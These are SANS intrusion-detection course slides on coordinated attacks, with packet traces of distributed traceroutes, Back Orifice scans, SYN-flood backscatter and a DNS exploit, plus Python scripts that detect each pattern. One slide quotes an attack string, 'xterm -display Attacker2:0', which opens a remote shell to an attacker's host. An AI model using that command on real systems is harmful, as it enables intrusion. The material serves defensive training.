IDIC – SANS GIAC LevelTwo ©2000, 2001

Slide 1: Coordinated Attacks
(multiple attackers working together to increase their stealth and firepower)

In our final section we are going to examine data from multiple sources. We will begin by introducing the notion of attackers working together; then we will discuss defenders working together. From an attacker's standpoint, there are two primary advantages to coordinated or distributed attacks:

- Stealth. By working from multiple IP addresses, the attackers are more difficult to detect. In addition, stealth is enhanced by the development of hard-to-detect probing techniques.
- Firepower. By coordinating multiple attacking IP addresses, the attackers will be able to deliver more exploits at a target in a smaller time window. The target in this case can be one or more sites. Further, the defense technique of blocking an attacker site (shunning) will be less effective.

Slide 2: External Network Mapping

10:32:24.722 north.mappem.com.38758 > ns.target.net.33476: udp 12
10:32:24.756 north.mappem.com.38758 > ns.target.net.33477: udp 12
10:32:24.801 north.mappem.com.38758 > ns.target.net.33478: udp 12
10:32:24.833 north.mappem.com.38758 > ns.target.net.33479: udp 12
10:32:24.944 north.mappem.com.38758 > ns.target.net.33481: udp 12
10:32:24.975 north.mappem.com.38758 > ns.target.net.33482: udp 12
10:32:26.745 south.mappem.com.48412 > ns.target.net.33512: udp 12
10:32:26.837 south.mappem.com.48412 > ns.target.net.33513: udp 12
10:32:26.930 south.mappem.com.48412 > ns.target.net.33514: udp 12
10:32:27.033 south.mappem.com.48412 > ns.target.net.33515: udp 12
10:32:27.231 south.mappem.com.48412 > ns.target.net.33517: udp 12
10:32:27.436 south.mappem.com.48412 > ns.target.net.33519: udp 12
10:32:26.541 east.mappem.com.58853 > ns.target.net.33491: udp 12
10:32:26.744 east.mappem.com.58853 > ns.target.net.33493: udp 12
10:32:26.836 east.mappem.com.58853 > ns.target.net.33494: udp 12
10:32:26.930 east.mappem.com.58853 > ns.target.net.33495: udp 12
10:32:27.033 east.mappem.com.58853 > ns.target.net.33496: udp 12
10:32:27.232 east.mappem.com.58853 > ns.target.net.33498: udp 12
10:32:27.323 east.mappem.com.58853 > ns.target.net.33499: udp 12

Simultaneous Traceroutes

The same technique may also be used for network triangulation and development of network state. Note the detect times; the traceroutes hit the target, a DNS server, from multiple locations within a few seconds. This gives them timing data for multiple paths. They could then use that state information to determine the best route to this site. The stimulus here was one of the internal hosts visiting a Web server at the ISP. The ISP wants to give the best possible service, so it runs a packet back from a couple of backbones, does some calculations to determine where the closest server is, and transfers the connection to that server the next time they click a URL.

Slide 3: Protected Network External Network Mapping Concept

[Figure: external network mapping concept. Labels: Protected Network, ISP #1, ISP #2, Internet, Router, Out of band network. Goal is to determine what machines make up the external layer of the protected network.]

Here is the concept in cartoons. From multiple endpoints, you fire packets at a single location from multiple backbones, probably connected via an out-of-band network. Note that you gather a lot of information about the space that is outside the target network, and they are not even aware of it. Also note that in the end there are a finite number of choke points. This is one of the concerns we have with this type of information gathering. The state table can be used to give the best possible service, but it may also be used to orchestrate an attack.
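The traceroute pattern on the External Network Mapping slide (a fixed source port walking UDP destination ports upward from 33434, from several hosts within a few seconds of each other) can be flagged directly from tcpdump summary lines. The following Python is an added example, not course material; it parses constructed sample lines modelled on the slide (the three traces trimmed to three probes each, plus one unrelated traceroute later in the hour) and reports any target traced from three or more hosts inside a five-second window. The port range, window and thresholds are assumptions to tune for your own sensor.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: the three traceroutes from the slide, trimmed to a few probes each,
# plus one unrelated traceroute half an hour later so there is something to reject.
SAMPLE = """\
10:32:24.722 north.mappem.com.38758 > ns.target.net.33476: udp 12
10:32:24.756 north.mappem.com.38758 > ns.target.net.33477: udp 12
10:32:24.801 north.mappem.com.38758 > ns.target.net.33478: udp 12
10:32:26.745 south.mappem.com.48412 > ns.target.net.33512: udp 12
10:32:26.837 south.mappem.com.48412 > ns.target.net.33513: udp 12
10:32:27.033 south.mappem.com.48412 > ns.target.net.33515: udp 12
10:32:26.541 east.mappem.com.58853 > ns.target.net.33491: udp 12
10:32:26.744 east.mappem.com.58853 > ns.target.net.33493: udp 12
10:32:27.323 east.mappem.com.58853 > ns.target.net.33499: udp 12
11:05:01.000 lone.example.com.40001 > ns.target.net.33434: udp 12
11:05:01.100 lone.example.com.40001 > ns.target.net.33435: udp 12
"""

# tcpdump UDP summary line: "HH:MM:SS.frac src.sport > dst.dport: udp len"
UDP_LINE = re.compile(
    r"^(\d\d:\d\d:\d\d\.\d+)\s+(\S+)\.(\d+)\s+>\s+(\S+)\.(\d+):\s+udp\s+\d+")

# Port range walked by classic UNIX traceroute (33434 upward, one port per probe).
TRACEROUTE_PORTS = range(33434, 33534)


def parse_udp(text):
    """Return (timestamp, src, sport, dst, dport) tuples for every UDP summary line."""
    pkts = []
    for line in text.splitlines():
        m = UDP_LINE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%H:%M:%S.%f")
            pkts.append((ts, m.group(2), int(m.group(3)), m.group(4), int(m.group(5))))
    return pkts


def traceroute_runs(pkts, min_probes=2):
    """Group packets by (src, sport, dst) and keep the groups that look like a traceroute:
    a fixed source port whose destination ports climb through the traceroute range.
    Returns {(src, sport, dst): (first_seen, last_seen)}."""
    groups = defaultdict(list)
    for ts, src, sport, dst, dport in pkts:
        if dport in TRACEROUTE_PORTS:
            groups[(src, sport, dst)].append((ts, dport))
    runs = {}
    for key, probes in groups.items():
        probes.sort()
        ports = [dport for _, dport in probes]
        if len(probes) >= min_probes and ports == sorted(ports):
            runs[key] = (probes[0][0], probes[-1][0])
    return runs


def simultaneous_traceroutes(runs, window=timedelta(seconds=5), min_sources=3):
    """Report targets traced from at least min_sources distinct hosts whose traceroutes
    started within one window of each other. Returns [(dst, (src, ...))]."""
    by_dst = defaultdict(list)
    for (src, _sport, dst), (first, _last) in runs.items():
        by_dst[dst].append((first, src))
    findings = []
    for dst, starts in by_dst.items():
        starts.sort()
        for i, (t0, src0) in enumerate(starts):
            group = {src0}
            group.update(src for t, src in starts[i + 1:] if t - t0 <= window)
            if len(group) >= min_sources:
                findings.append((dst, tuple(sorted(group))))
                break  # one finding per target is enough
    return findings


if __name__ == "__main__":
    for dst, sources in simultaneous_traceroutes(traceroute_runs(parse_udp(SAMPLE))):
        print(f"{dst}: traced from {len(sources)} hosts within seconds: {', '.join(sources)}")
```

Run against the sample, the three mappem.com hosts are reported together for ns.target.net and the lone traceroute at 11:05 is not, because its start time is outside the window. A single traceroute is normal operator behaviour; it is the count of distinct sources inside a short window that makes this worth a second look.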
Slide 4: Searching for Back Orifice

04:10:34.355832 dax.no.1534 > TARGETBa.31337: udp 19
04:51:15.261462 cpu.com.1534 > TARGETBb.31337: udp 19
04:54:19.101595 dax.no.1534 > TARGETBc.31337: udp 19
06:51:39.392441 dax.no.1534 > TARGETAa.31337: udp 19
06:52:32.700418 cpu.com.1534 > TARGETAb.31337: udp 19
06:06:52.320331 eb.net.1534 > TARGETAc.31337: udp 19

Here is a simple signature, trolling for Back Orifice. But before you relax too much, take a closer look. In a short time frame, three attackers with the same signature were detected at multiple target locations. eb may be working independently; this machine was not seen at all the attacked sites. Is this a coincidence, or could the machines be working together? Given the data shown on the slide, it is hard to say. Even though they were seen at four different locations at fairly close time intervals, it is not possible to say they were working together. They could simply have the same attack address list or address generation algorithm and have started an automated process at the same time. On the other hand, ruling out that the systems are working together might not be wise. Across site A and site B, do the attackers tend to scan the same addresses? That would be an indication they are using the same address list. If within A and B they tend to scan DIFFERENT addresses, you have a pattern worth further study.
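The slide's closing question, whether the attackers seen at sites A and B scan the same addresses, can be answered from the probe log with a target-overlap check. The Python below is an added example, not from the course; it reads constructed lines modelled on the slide (plus one extra probe so that one pair of attackers overlaps), takes the TARGETA*/TARGETB* names as a site convention, and reports per-attacker site coverage and pairwise Jaccard overlap of targets. The Back Orifice signature matched (UDP to 31337 with a 19-byte payload) is the one shown on the slide; the thresholds and the naming convention are assumptions.

```python
import re
from collections import defaultdict
from itertools import combinations

# Constructed sample: the six probes from the slide plus one extra (cpu.com hitting TARGETAc)
# so that at least one attacker pair shares a target. Names follow the slide's convention,
# TARGETA* and TARGETB*, read here as "site A" and "site B".
SAMPLE = """\
04:10:34.355832 dax.no.1534 > TARGETBa.31337: udp 19
04:51:15.261462 cpu.com.1534 > TARGETBb.31337: udp 19
04:54:19.101595 dax.no.1534 > TARGETBc.31337: udp 19
06:51:39.392441 dax.no.1534 > TARGETAa.31337: udp 19
06:52:32.700418 cpu.com.1534 > TARGETAb.31337: udp 19
06:06:52.320331 eb.net.1534 > TARGETAc.31337: udp 19
06:30:00.000000 cpu.com.1534 > TARGETAc.31337: udp 19
"""

UDP_LINE = re.compile(r"^\S+\s+(\S+)\.(\d+)\s+>\s+(\S+)\.(\d+):\s+udp\s+(\d+)")


def bo_probes(text, port=31337, length=19):
    """{attacker: {target, ...}} for packets matching the Back Orifice ping signature on the
    slide: UDP to port 31337 carrying 19 bytes."""
    seen = defaultdict(set)
    for line in text.splitlines():
        m = UDP_LINE.match(line)
        if m and int(m.group(4)) == port and int(m.group(5)) == length:
            seen[m.group(1)].add(m.group(3))
    return seen


def site_of(target):
    """Assumed naming convention: TARGETA... belongs to site A, TARGETB... to site B."""
    return target[len("TARGET")]


def site_coverage(seen):
    """Which sites each attacker touched; one seen at a single site may be independent."""
    return {a: sorted({site_of(t) for t in targets}) for a, targets in seen.items()}


def compare_pairs(seen):
    """For each attacker pair with at least one site in common, measure target overlap as a
    Jaccard index. High overlap suggests a shared address list; no overlap at a common site
    suggests the addresses were divided up, the pattern the slide says is worth study."""
    verdicts = {}
    for a, b in combinations(sorted(seen), 2):
        common_sites = {site_of(t) for t in seen[a]} & {site_of(t) for t in seen[b]}
        if not common_sites:
            continue
        inter = seen[a] & seen[b]
        union = seen[a] | seen[b]
        jaccard = len(inter) / len(union)
        if jaccard >= 0.5:
            verdict = "shared address list likely"
        elif inter:
            verdict = "partial overlap"
        else:
            verdict = "disjoint targets at a common site: possible work split"
        verdicts[(a, b)] = (round(jaccard, 2), verdict)
    return verdicts


if __name__ == "__main__":
    seen = bo_probes(SAMPLE)
    for attacker, sites in site_coverage(seen).items():
        print(f"{attacker}: sites {''.join(sites)}, {len(seen[attacker])} targets")
    for (a, b), (score, verdict) in compare_pairs(seen).items():
        print(f"{a} vs {b}: jaccard={score} {verdict}")
```

With the slide's data, dax.no and cpu.com both cover sites A and B yet never hit the same host, which is exactly the "different addresses within the same sites" case the slide flags; eb.net appears at site A only. The Jaccard cutoff of 0.5 is a starting point, not a calibrated threshold; with a handful of probes per attacker, the site-coverage table is usually the more telling output.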
Slide 5: Simultaneous RESET Scans By Related Addresses

17:40:45.870769 hook.24408 > target1.1457: R 0:0(0) ack 674719802 win 0
17:40:53.025203 hook.33174 > target2.1457: R 0:0(0) ack 674719802 win 0
17:41:12.115554 hook.36250 > target3.1979: R 0:0(0) ack 674719802 win 0
17:43:37.605127 router > hook: icmp: time exceeded in-transit
17:43:43.139158 hook.44922 > target4.1496: R 0:0(0) ack 674719802 win 0
17:42:30.400665 grin.3532 > target1a.1167: R 0:0(0) ack 674719802 win 0
17:42:40.582531 grin.33233 > target2a.1797: R 0:0(0) ack 674719802 win 0
17:44:28.836701 grin.52504 > target3a.1634: R 0:0(0) ack 674719802 win 0
17:47:52.578558 grin.46657 > target4a.2121: R 0:0(0) ack 674719802 win 0
17:47:52.698378 router > grin: icmp: time exceeded in-transit

674719802 is a signature ACK number of a SYN flood. If you are an analyst, you want to put your quarter on a denial of service attack. For that to be true, both hook and grin would have to be under attack at the same time. Are these a stimulus or a response? A RST is a response. If the RST is coming to target1, etc., then this must have been the source address range used for the denial of service. Let's take a conspiracy theory pause. Even if this really is a denial of service attack against hook and grin, do they get mapping information about this site? They certainly do; the target site is not behind a NAT and will give out important data. Note the ICMP error messages.

Slide 6: DNS ZONE Variation
One IP attacks, the second IP receives the data

01:46:06.41 attacker.23616 > target.domain: S 4076745461:4076745461(0) win 512 <mss 1460>
01:46:06.42 target.domain > attacker.23616: S 2085251122:2085251122(0) ack 4076745462 win 17520 <mss 1460> (DF)
01:46:07.14 attacker.23616 > target.domain: . ack 1 win 31744 (DF)
01:46:07.34 attacker.23616 > target.domain: P 1:3(2) ack 1 win 31744 (DF)
01:46:07.51 target.domain > attacker.23616: . ack 3 win 17520 (DF)
01:46:07.58 attacker.23616 > target.domain: . 3:1463(1460) ack 1 win 31744 (DF)
01:46:07.61 attacker.23616 > target.domain: P 1463:1563(100) ack 1 win 31744 (DF)
01:46:07.61 attacker.23616 > target.domain: F 1563:1563(0) ack 1 win 31744

Courtesy Pedro Vazquez - Unicamp

In the example above, the attacker scans the net until he finds a DNS server that will respond on 53 TCP. The attacker establishes a connection. There is a data transfer; he then sends attack packets, including the strings shown on the next slide.

Slide 7: DNS ZONE Variation (2)
One IP attacks, the second IP receives the data

Courtesy Pedro Vazquez - Unicamp

Content from the attack packets (cleaned up of 8-bit chars) sent against the DNS servers (target):

%strings ibm|grep bin
/usr/X11R6/bin/xterm -display Attacker2:0
/usr/X11R6/bin/xterm -display Attacker2:0
/usr/X11R6/bin/xterm -display Attacker2:0
/usr/X11R6/bin/xterm -display Attacker2:0
/usr/X11R6/bin/xterm -display Attacker2:0

The point of this is to give them terminal access on the DNS server. In this attack, they probe from one site and then try to open up a remote terminal to a second location. It should be noted this is a wonderful opportunity to counterattack, but we won't go there : )

Slide 8: Correlation (the current frontier)

• Single sensor coverage is a computerized form of tunnel vision
• Successful analysis requires:
  – Fusing observations from multiple types of sensors
  – Correlating observations from similar sensors
  – Building the answer a piece at a time

In our final section, we want to look at some attacks that have the same event, or a similar event, shown from more than one log source. Correlation is one of the most important techniques available to an analyst.
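Sorting the RSTs on the Simultaneous RESET Scans slide by ACK number is the quickest way to settle the stimulus-or-response question. The Python below is an added example, not from the course; it parses constructed lines modelled on that slide (the ICMP lines dropped, plus one ordinary RST carrying a different ACK number), clusters bare RSTs by ACK value, and for any value reused toward several addresses from more than one sender names the RST senders as the likely flood victims and the RST destinations as the address range the flood forged as its source. The thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: the RST lines from the slide (ICMP lines dropped) plus one ordinary
# RST with a different ACK number, which must not be grouped with them.
SAMPLE = """\
17:40:45.870769 hook.24408 > target1.1457: R 0:0(0) ack 674719802 win 0
17:40:53.025203 hook.33174 > target2.1457: R 0:0(0) ack 674719802 win 0
17:41:12.115554 hook.36250 > target3.1979: R 0:0(0) ack 674719802 win 0
17:43:43.139158 hook.44922 > target4.1496: R 0:0(0) ack 674719802 win 0
17:42:30.400665 grin.3532 > target1a.1167: R 0:0(0) ack 674719802 win 0
17:42:40.582531 grin.33233 > target2a.1797: R 0:0(0) ack 674719802 win 0
17:44:28.836701 grin.52504 > target3a.1634: R 0:0(0) ack 674719802 win 0
17:47:52.578558 grin.46657 > target4a.2121: R 0:0(0) ack 674719802 win 0
17:50:00.000000 webhost.80 > target1.3301: R 0:0(0) ack 910331 win 0
"""

# tcpdump TCP summary line for a RST: "ts src.sport > dst.dport: R a:b(len) ack N win W"
RST_LINE = re.compile(
    r"^(\d\d:\d\d:\d\d\.\d+)\s+(\S+)\.(\d+)\s+>\s+(\S+)\.(\d+):\s+R\s+\d+:\d+\((\d+)\)"
    r"\s+ack\s+(\d+)\s+win\s+(\d+)")


def parse_rsts(text):
    """Return one dict per RST summary line; other lines (ICMP, data segments) are skipped."""
    pkts = []
    for line in text.splitlines():
        m = RST_LINE.match(line)
        if m:
            pkts.append({"ts": datetime.strptime(m.group(1), "%H:%M:%S.%f"),
                         "src": m.group(2), "sport": int(m.group(3)),
                         "dst": m.group(4), "dport": int(m.group(5)),
                         "datalen": int(m.group(6)), "ack": int(m.group(7)),
                         "win": int(m.group(8))})
    return pkts


def backscatter_groups(pkts, min_responders=2, min_targets=3):
    """Cluster bare RSTs (no payload, window 0) by ACK number. One ACK value reused toward many
    different addresses is what hosts produce when they answer forged SYNs that all carried the
    same sequence number: the RST senders are the flood victims and the RST destinations are
    the range the flood tool forged as its source."""
    by_ack = defaultdict(list)
    for p in pkts:
        if p["datalen"] == 0 and p["win"] == 0:
            by_ack[p["ack"]].append(p)
    groups = []
    for ack, plist in by_ack.items():
        responders = sorted({p["src"] for p in plist})
        forged = sorted({p["dst"] for p in plist})
        if len(responders) >= min_responders and len(forged) >= min_targets:
            plist.sort(key=lambda p: p["ts"])
            groups.append({"ack": ack, "victims": responders, "forged_range": forged,
                           "first": plist[0]["ts"].time().isoformat(),
                           "last": plist[-1]["ts"].time().isoformat()})
    return groups


if __name__ == "__main__":
    for g in backscatter_groups(parse_rsts(SAMPLE)):
        print(f"ack {g['ack']}: victims {', '.join(g['victims'])}; "
              f"{len(g['forged_range'])} of our addresses used as forged source "
              f"between {g['first']} and {g['last']}")
```

On the sample this yields one cluster, ACK 674719802, with hook and grin as responders and eight local addresses as the forged range; the lone RST from webhost with its own ACK number is left alone. Reading it the slide's way: the RSTs are responses, hook and grin are the ones under attack, and the list of forged addresses tells you which of your hosts answered, which is the mapping information the slide warns is leaking.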
Slide 9: Manual Correlation Benefits

• Primary key to maintain situational awareness
• System log file and an alert system administrator can greatly enhance site's detection effectiveness
• Correlating system information with network logs can help scope the size and intensity of an event

Within a site, correlating ID sensors and system logs is a powerful tool. With TCP Wrappers or the equivalent, detection is near real time. If there is an alarming syslog capability such as swatch, ID sensors can be focused on the connecting host. As we correlate logs from multiple sources, we get a better and better picture of what is happening. This is how we determine how widespread and serious an attack is; this is how we build situational awareness. A good analyst should never rely on a single type of log file.

Slide 10: Correlation Approach

• Locate secondary sources of data at your facility (network ID and system logs)
• To the extent you can, share detect data with others: source addresses and detect patterns
• Learn to read a variety of log formats

Many times a different sensor, such as a host log, will have information beyond what one can get from a network sensor. However, you have to locate these data sources ahead of time if they are going to be of any value when you come under attack. Also, it can take a while to get comfortable with different log formats. We certainly don't know all of them, but it really makes sense to know the ones at your facility.

Outline

• Background
• Common Errors
• Exploits and Denial of Service Attacks
• Network Mapping / Information Gathering
• Subtle and Stealthy Attacks
• Coordinated Attacks

Now get out there and collect and examine some traces, and don't forget to send interesting ones to intrusion@sans.org
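The Manual Correlation Benefits and Correlation Approach slides describe joining host logs with network sensor data by source address, so that a syslog alarm can focus the network sensor and the combined picture scopes the event. The Python below is an added example, not from the course; it parses constructed TCP Wrappers style syslog lines and a simplified, invented sensor-alert format, maps sensor addresses to host names through an assumed asset list (the "locate your data sources ahead of time" point in practice), and summarises per source address which sensor types saw it, how many hosts it touched and over what span. The year, the alert format and the asset list are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample logs (not from the course). Host side: TCP Wrappers style syslog lines.
# Network side: a simplified sensor alert format invented for this example. All addresses
# are documentation ranges.
SYSLOG = """\
Nov  8 04:47:16 ns1 in.telnetd[2113]: refused connect from 192.0.2.7
Nov  8 04:47:20 www in.ftpd[2140]: refused connect from 192.0.2.7
Nov  8 05:10:02 mail sendmail[311]: NOQUEUE: connect from 198.51.100.9
"""
NIDS = """\
11/08-04:47:15.000 192.0.2.7:3344 -> 10.1.1.53:23 telnet login attempt
11/08-04:47:19.443 192.0.2.7:3345 -> 10.1.1.80:21 ftp connect
11/08-04:47:21.000 192.0.2.7:3346 -> 10.1.1.25:25 smtp connect
11/08-09:00:00.000 203.0.113.4:1025 -> 10.1.1.53:53 dns query
"""
# Assumed asset list, prepared ahead of time, so that the host name in syslog and the
# address in a sensor alert resolve to the same machine.
ASSETS = {"10.1.1.53": "ns1", "10.1.1.80": "www", "10.1.1.25": "mail"}
YEAR = 2001  # syslog lines carry no year; assumed for the example

SYSLOG_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) (\S+) (\S+?)\[\d+\]: .*connect from (\d+\.\d+\.\d+\.\d+)")
NIDS_RE = re.compile(
    r"^(\S+) (\d+\.\d+\.\d+\.\d+):\d+ -> (\d+\.\d+\.\d+\.\d+):(\d+) (.*)$")


def parse_syslog(text):
    """TCP Wrappers / sendmail 'connect from' lines -> events keyed by the connecting address."""
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if m:
            stamp = " ".join(m.group(1).split())  # collapse the day padding in "Nov  8"
            ts = datetime.strptime(stamp, "%b %d %H:%M:%S").replace(year=YEAR)
            events.append({"ts": ts, "src": m.group(4), "target": m.group(2),
                           "sensor": "host", "detail": m.group(3)})
    return events


def parse_nids(text):
    """Sensor alerts -> events; destination addresses are translated through the asset list."""
    events = []
    for line in text.splitlines():
        m = NIDS_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%m/%d-%H:%M:%S.%f").replace(year=YEAR)
            target = ASSETS.get(m.group(3), m.group(3))
            events.append({"ts": ts, "src": m.group(2), "target": target,
                           "sensor": "network", "detail": f"{m.group(5)} (port {m.group(4)})"})
    return events


def correlate(events):
    """Per source address: which sensor types saw it, which hosts it touched and over what
    span. Seen by more than one sensor type means corroborated; the target count scopes how
    widespread the activity is."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    summary = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        sensors = sorted({e["sensor"] for e in evs})
        summary[src] = {
            "sensors": sensors,
            "targets": sorted({e["target"] for e in evs}),
            "events": len(evs),
            "span_seconds": (evs[-1]["ts"] - evs[0]["ts"]).total_seconds(),
            "corroborated": len(sensors) > 1,
        }
    return summary


def focus_list(summary):
    """Sources worth pointing the network sensor at: those a host log has already confirmed."""
    return sorted(src for src, s in summary.items() if s["corroborated"])


if __name__ == "__main__":
    summary = correlate(parse_syslog(SYSLOG) + parse_nids(NIDS))
    for src in focus_list(summary):
        s = summary[src]
        print(f"{src}: seen by {'+'.join(s['sensors'])}, {len(s['targets'])} hosts "
              f"in {s['span_seconds']:.0f}s")
```

On the sample, 192.0.2.7 is the only corroborated source: the sensor saw it touch three hosts in six seconds and TCP Wrappers on two of them refused it, which is both the confirmation and the scope the slides talk about. 198.51.100.9 appears only in the mail host's log and 203.0.113.4 only on the sensor, so each stays a single-source observation until another log speaks up. Clock skew between the syslog host and the sensor is the usual practical snag; sorting by timestamp only works if both are synchronised.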